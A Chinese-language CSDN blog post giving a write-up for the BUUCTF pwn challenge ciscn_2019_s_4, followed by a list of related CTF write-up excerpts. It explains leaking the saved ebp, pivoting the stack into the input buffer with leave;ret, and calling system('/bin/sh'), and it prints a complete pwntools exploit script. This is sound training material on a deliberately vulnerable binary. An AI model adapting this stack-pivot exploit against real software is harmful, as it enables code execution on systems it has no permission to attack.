[BUUCTF-pwn]——ciscn_2019_s_4

最新推荐文章于 2023-06-07 20:36:33 发布
最新推荐文章于 2023-06-07 20:36:33 发布
阅读量484 收藏 2
点赞数 1
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/114698219
版权

[BUUCTF-pwn]——ciscn_2019_s_4

这道题是一道典型的栈劫持问题

前面有一道类似的点击进入, 如果需要可以去做一下

没有开启canary保护
在这里插入图片描述
在IDA中, 可以看出有明显的栈溢出, 不过溢出空间只够修改ebp和一个返回地址
在这里插入图片描述
但是, 仅仅一个返回地址是不够的, 并不能打印flag
在这里插入图片描述

思路

利用栈溢出,首先泄露出来main_ebp的地址
计算一下,我们输入的位置, 距离main_ebp的距离, 找到s的地址
在这里插入图片描述
最后将栈劫持到s的地址上面, 构造rop链

exploit

from pwn import *

#p=remote('node3.buuoj.cn',29981)
p = process('./ciscn_s_4')
elf = ELF('./ciscn_s_4')
leave_ret=0x8048562
#gdb.attach(p, 'b *0x080485CD')
payload = 'a' *0x24 + 'cccc'
p.send(payload)
p.recvuntil('cccc')
main_ebp=u32(p.recv(4))
log.success('main_ebp ------> ' + hex(main_ebp))

s_addr = main_ebp - 0x38

payload = 'junk' + p32(elf.plt['system']) + 'junk' + p32(s_addr + 16) + '/bin/sh\x00'
payload = payload.ljust(0x28,'a') + p32(s_addr) + p32(leave_ret)
p.send(payload)
p.interactive()
Y-peak
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
栈迁移图解
qq_40410406的博客
11-11 1502
栈迁移 场景 1 如果程序的保护措施canary开启,会在prev ebp栈空间的下一个低地址存放一个随机值,当我们溢出时会将这个随机值覆盖,程序检测到这个随机值发生变化以后会自动退出(崩溃),此时就无法进行栈溢出攻击,所以需要另寻出路。 2 栈溢出长度不足以使用直接 ROP 3 栈溢出 payload 会出现空字符截断,且gadget地址含有空字符 4 在泄露地址信息后需要新的 ROP payload 5 如果开启了栈不可执行保护,就需要栈迁移到bss段或者data段或者其他栈位置执行我们的gadge
pwnciscn_2019_s_4
Nothing
03-06 787
main函数,存在八个字节溢出,栈迁移,第一次泄露ebp,得到栈上buf地址,迁移到buf即可。 from pwn import * io=remote('node3.buuoj.cn',28060) leave=0x8048562 sys_plt=0x8048400 pl1='a'*0x24+'bbbb' io.send(pl1) io.recvuntil('bbbb') ebp=u32(...
ciscn_2019_s_4
doudoudedi
01-26 998
可以看到有栈溢出的漏洞能过控制执行流 exp: #!/usr/bin/python2 from pwn import * from LibcSearcher import * local=0 if local==1: p=process('./ciscn_s_4') elf=ELF('./ciscn_s_4') #libc=elf.libc else: p=remo...
PwnBUUCTF ciscn_2019_s_4 wp 栈迁移
Lcw_linyx的博客
05-20 555
个人日记= =,记录pwn自己的自闭过程
buuctf ciscn_2019_s_4 pwn wp
weixin_44740530的博客
04-21 366
buuctf ciscn_2019_s_4 pwn wp https://www.jianshu.com/p/fabc34bafe18
ciscn_2019_s_4 [write up]
m0_73756460的博客
01-14 221
buuctf刷题 ciscn_2019_s_4 【write up】
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 555
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
BUUCTF - PWNciscn_2019_c_1
古月浪子的博客
03-20 4072
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
Pwn-Ciscn_2019_Final
fayinq的博客
03-11 378
Ciscn_2019_Final 感觉是一道很好的堆题,使用了很多技巧以及做题思路,包括了uaf,_IO_2_1_stdin,double_free,还有 _IO_2_1_stdin_fileno,这些技巧。 IDA分析: main函数: init函数: 沙箱:(少截取一点为无所谓) allocate函数: 这里面每次无论add了int还是short int 都会把bool修改成1。 delete函数: ​ del有一段特殊判定,就是bool的判定,因为bool的存在,导致了没有办法连续释放i
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
BUUCTF pwn ciscn_2019_n_8
菜的只能随便写写博客
02-03 2621
0x01 文件分析  文件很简单,32位,保护都开得差不多。   0x02 运行  输入并且回显。   0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...
ciscn_2019_s_4-栈迁移
个人笔记
06-07 697
思路:由于无直接getshell的利用函数,溢出空间只有8字节(ebp+ret占用无法继续填充ROP了),所以需要栈迁移更大的空间来构造ROP。栈迁移位置:执行函数+0xdeadbeef(假ebp)+0xdeadbeef(假ret)+参数。此栈帧迁移到s[40]数组的位置,先通过第一次打印泄露s[40]的起始地址。栈迁移核心(通过ROPGadget寻找。ebp位置:栈迁移位置-4(32位)ret位置:leave_ret。题目类型猜测:栈溢出,栈迁移。作用:赋值执行函数调用。
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 432
buuctf-pwn 001-016题wp
buuctf-pwn write-ups (4)
CoLin的pwn小屋
06-12 519
buuctf 032-038题题解,重点关注038题 pwnable_orw
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 281
buuctf-pwn 017-026题wp,重点关注babyheap
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3222
前言 开始刷一刷BuuctfPWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
buuctf-pwn write-ups (3)
CoLin的pwn小屋
05-15 276
buuctf pwn 027-031题
buuctf-pwn write-ups (5)
CoLin的pwn小屋
06-17 242
buuctf-pwn 039~046题
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值